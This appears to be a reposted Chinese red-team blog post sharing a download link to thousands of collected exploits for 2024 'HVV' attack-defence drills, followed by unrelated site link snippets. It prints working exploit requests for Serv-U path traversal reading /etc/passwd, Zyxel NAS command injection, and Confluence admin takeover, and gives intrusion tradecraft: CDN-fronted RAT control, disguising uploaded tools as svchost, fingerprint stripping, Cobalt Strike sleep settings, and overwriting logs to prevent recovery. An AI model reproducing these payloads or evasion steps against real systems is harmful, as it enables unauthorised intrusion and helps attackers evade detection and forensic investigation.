2024HVV最新POC/EXP,目前有8000+个POC/EXP

7e6880914ee4e2f593d8c3c25c2c81f3.gif

点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维a0c78db9e742f19ceca6f0215a260b9c.png

让我们每天进步一点点

简介

都是网上收集的POC和EXP,最新收集时间是2024年五月,需要的自取。

表里没有的可以翻翻之前的文章,资源比较零散没有整合起来。

文件链接:

https://pan.baidu.com/s/1OiyRctbpROh5AZO0SJ9kzQ?pwd=6666

其他资源失效了请给我留言

3a34fd7c562293a342fefb53a3248beb.png

实战

CVE-2024-28995 Serv-U

EXP
curl -i -k --path-as-is https://192.168.86.43/?InternalDir=\..\..\..\..\etc^&InternalFile=passwd
文章连接:https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis

CVE-2024-37032 开源AI模型 Ollama 远程代码执行漏洞

POC:http://[victim]:11434/api/pull
文章连接:https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032

CVE-2024-29972 – NsaRescueAngel后门账户

POC:ip后面直接添加
/cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi CGIGetExtStoInfo None) and False or __import__('subprocess').check_output('id', shell=True)%23信息泄露
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6------WebKitFormBoundaryHHaZAYecVOf5sfa6Content-Disposition: form-data; name="c0"
storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#------WebKitFormBoundaryHHaZAYecVOf5sfa6--

CVE-2023-22515-Atlassian Confluence Data Center 权限管理不当

EXPGET /server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: localhost:8090
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Atlassian-Token: no-check在进行覆盖 setupComplete=false 之后重新注册管理员POST /setup/setupadministrator.action HTTP/1.1
Host:127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Atlassian-Token: no-check
Content-Length: 122
Content-Type: application/x-www-form-urlencodedusername=elk&fullName=elk&email=elk@qq.comt&password=elk&confirm=elk&setup-next-button=Next

祝各位HVV顺利

工作环境

  • 工作时全部操作均在虚拟机中完成

  • 虚拟机中不登陆个人账号,如QQ、微信、网盘、CSDN等

  • 渗透环境、开发环境、调试环境需要分开,从目标服务器上下载的程序需要在单独的环境中测试运行

  • 渗透虚拟机中全程使用代理IP上网

  • 物理机必须安装安全防护软件,并安装最新补丁,卸载与公司相关的特定软件

  • fofa、cmd5、天眼查等第三方工具平台账号密码不得与公司有关,云协作平台同理

  • RAT使用CDN保护的域名上线

  • 尽量不使用公司网络出口,可以使用移动4G网卡,然后虚拟机再链代理

渗透工具

  • WebShell不能使用普通一句话木马,连接端使用加密流量,建议使用蚁剑

  • 不使用默认冰蝎,需要修改为硬编码密钥

  • 内网渗透时尽量使用socks代理,在本地操作

  • 上传程序到目标服务器时,需要修改文件名:如svchost等,尽量不上传内部自研工具

  • 公开工具需要去除特征指纹,如:sqlmap、masscan、Beacon证书

  • 工具需要设置线程或访问频率,如sqlmap的--delay、内网扫描时线程不大于5

  • Cobalt Strike后⻔上线后,设置time.sleep⼤于500秒

  • 手机短信验证码需使用在线平台如z-sms.com

  • socks代理通道需要使用SSL加密

重点

  • 攻防演习成功的关键是团队协作,要互相帮助学习和进步,不要勾心斗角,每个团队的成功都需要有人当红花有人当绿叶的,外网打点与内网渗透同等重要

  • 渗透过程中,记住上传的webshell、木马等地址,服务器添加的账号,项目结束后要删除或描述在报告中,避免不必要的麻烦

  • 登陆3389不建议添加用户,尝试激活guest,如必须要添加账号,账号名与目标相关即可,避免使用qax、qaxNB等友商关键词

  • 清理日志时需要以文件覆盖的方式删除文件,防止数据恢复,或者仅删除指定ID的日志

  • 碰到蜜罐就不要慌,多喝点花茶,这样嘎了会比较香

往期内容

2023HW-8月(10-15)53个0day,1day漏洞汇总含POC、EXP

Stable DiffusionAI绘画一键启动整合包

能让你躺着挖洞的BurpSuite插件

25acd99b0ea666233f15bfc2ec6c5194.gif

54298327cefc95680dcf38f079fecc60.gif

更多资讯长按二维码 关注我们

   专业的信息安全团队,给你最安全的保障。定期推送黑客知识和网络安全知识文章,让各位了解黑客的世界,学习黑客知识,普及安全知识,提高安全意识。

觉得不错点个“赞”呗ce4b1f9647845c78bbb5e44935c9fb82.png      

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/37524.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

hexo博客搭建

系列文章目录 文章目录 系列文章目录前言1. 环境配置2. 打包并发布到github仓库3. 生成ssh秘钥4.vscode配置本地与远端相对路径不一致问题总结 前言 本文主要介绍了hexo博客怎么搭建 1. 环境配置 安装git、nodejs、npm创建博客文件夹blogcmd输入命令npm install -g hexo初始化…

10波形震荡原因及采集设备安装视频

10波形震荡原因及采集设备安装视频 排查过程算法软件后台解码计算嵌入式采集设备准备视频 结语其他以下是废话 之前说过:“解决不了的真的就不是我这边能解决的了”,这是因为我们充分排查了自身,那么问题出在哪里呢? 不愿沟通、不…

Spring Boot 全面解析:从入门到实践案例

引言: Spring Boot 是由 Pivotal 团队提供的全新框架,旨在简化 Spring 应用的初始搭建以及开发过程。它基于 Spring 平台,通过“约定优于配置”的原则,尽可能自动化配置,减少XML配置,使得开发者能够快速启…

矢量数据库:概念、历史、现状与展望?

矢量数据库:概念、历史、现状与展望? 李升伟 概念:矢量数据库是一种专门用于存储、检索和搜索矢量的数据库。在数据科学和机器学习中,矢量是表示数据的有序列表或数字序列,可以表示各种类型的数据,如文本…

阿里云智能编程助手的安装使用

https://help.aliyun.com/document_detail/2590613.html 通义灵码,是阿里云出品的一款基于通义大模型的智能编码辅助工具,提供行级/函数级实时续写、自然语言生成代码、单元测试生成、代码优化、注释生成、代码解释、研发智能问答、异常报错排查等能力&a…

前后端防重复提交

数据重复提交是一个大忌,会带来无效数据,应该在前端和后端都建议检测防范。 前端一般是按钮按下触发数据提交,如果用户鼠标操作习惯不好,或者鼠标或系统设置问题会导致鼠标连击,如果前端不做相关处理,可能会…

洞察数据资产的奥秘:深入剖析数据资产在企业运营中的核心作用,提出一套全面、系统的数据资产解决方案,帮助企业实现数据资产的最大化利用和增值

一、引言 在数字化浪潮汹涌的今天,数据已成为企业最宝贵的资产之一。数据资产不仅记录了企业的历史运营轨迹,更蕴含着指导未来决策的智慧。然而,如何有效管理、利用这些数据资产,使其转化为企业的竞争优势和利润增长点&#xff0…

Vue3-04_组件基础_下

props验证 指的是在封装组件时对外界传递过来的 props 数据进行合法性的校验,从而防止数据不合法的问题。 使用数组类型的 props 节点的缺点是无法为每个 prop 指定具体的数据类型。 使用对象类型的 props 节点,可以对每个 prop 进行数据类型的校验&am…

【云服务-5】Elasticsearch

Elasticsearch是什么?和大数据的关系? Elasticsearch 是一个分布式、开源的搜索和分析引擎,建立在 Apache Lucene 库之上。它的主要特点包括: (1)快速、可扩展的搜索和分析能力 (2)支持多租户和高可用性 …

python--基础篇--正则表达式--py脚本--题目解答

文章目录 验证输入用户名和QQ号是否有效并给出对应的提示信息从一段文字中提取出国内手机号码替换字符串中的不良内容拆分长字符串 验证输入用户名和QQ号是否有效并给出对应的提示信息 """ 验证输入用户名和QQ号是否有效并给出对应的提示信息要求:用…

常用数据库简单介绍

1. MySQL 优势: 开源和免费:MySQL 是一个开源数据库,拥有庞大的社区支持,易于获取和使用。性能优秀:对于中小型项目,MySQL 提供了高效的性能和响应速度。跨平台支持:MySQL 可以在各种操作系统…

扎克伯格抨击闭源人工智能竞争对手试图“创造上帝”

Meta 首席执行官马克-扎克伯格(Mark Zuckerberg)在周四发表的一篇访谈中谈到了他对人工智能未来的看法,他深信"不会只有一种人工智能"。扎克伯格强调了开源的价值,即把人工智能工具交到许多人手中,他还不忘贬…

抖音微短剧小程序源码搭建:实现巨量广告数据高效回传

在数字化营销日益盛行的今天,抖音微短剧小程序已成为品牌与观众互动的新渠道。这些短小精悍的剧目不仅能迅速抓住用户的注意力,还能有效提升品牌的知名度和用户黏性。然而,想要充分利用这一营销工具,关键在于如何高效地追踪广告数…

堆的 shift down

堆的 shift down 堆(Heap)是一种特殊的完全二叉树,它通常用于实现优先队列。在堆中,每个节点的值都大于或等于(在最大堆中)或小于或等于(在最小堆中)其子节点的值。堆的操作包括插入元素(shift up)和删除元素(shift down 或 bubble down)。 本文将重点介绍堆的 s…

HDFS EC文件损坏恢复方法

HDFS EC低版本存在许多bug,导致文件损坏,这些bug是在一定的条件下才有机率性的错误重构。 我们当前版本是3.1.1,使用前已修复部署EC patch了,但还是损坏了文件,而且这些文件是无任何提示异常的。是在进行读数据的时候…

从0开始学习pyspark--pyspark的启动模式[第1节]

PySpark是Apache Spark的Python API,它能够在分布式计算环境中处理大规模数据。PySpark可以在几种不同的模式下运行,主要包括以下三种: 本地模式(Local Mode)集群模式(Cluster Mode)客户端模式…

springboot中使用springboot cache

前言&#xff1a;SpringBoot中使用Cache缓存可以提高对缓存的开发效率 此图片是SpringBootCache常用注解 Springboot Cache中常用注解 第一步&#xff1a;引入依赖 <!--缓存--><dependency><groupId>org.springframework.boot</groupId><artifactId…

使用ExpandableListView创建可扩展列表

使用ExpandableListView创建可扩展列表 大家好&#xff0c;我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编&#xff0c;也是冬天不穿秋裤&#xff0c;天冷也要风度的程序猿&#xff01;今天我们将深入探讨如何使用Android中的ExpandableListView创建可扩展列…

【linux】gcc快速入门教程

目录 一.gcc简介 二.gcc常用命令 一.gcc简介 gcc 是GNU Compiler Collection&#xff08;GNU编译器套件&#xff09;。就是一个编译器。编译一个源文件的时候可以直接使用&#xff0c;但是源文件数量太多时&#xff0c;就很不方便&#xff0c;于是就出现了make 工具 二.gcc…

vue实现鼠标拖动元素把二级分组放入一级分组

拖动案例demo实现 <template><div><div class"group one-level"><divclass"group-item"v-for"(group, index) in groups":key"group.id"draggable"true"dragstart"dragStart(group, $event)"…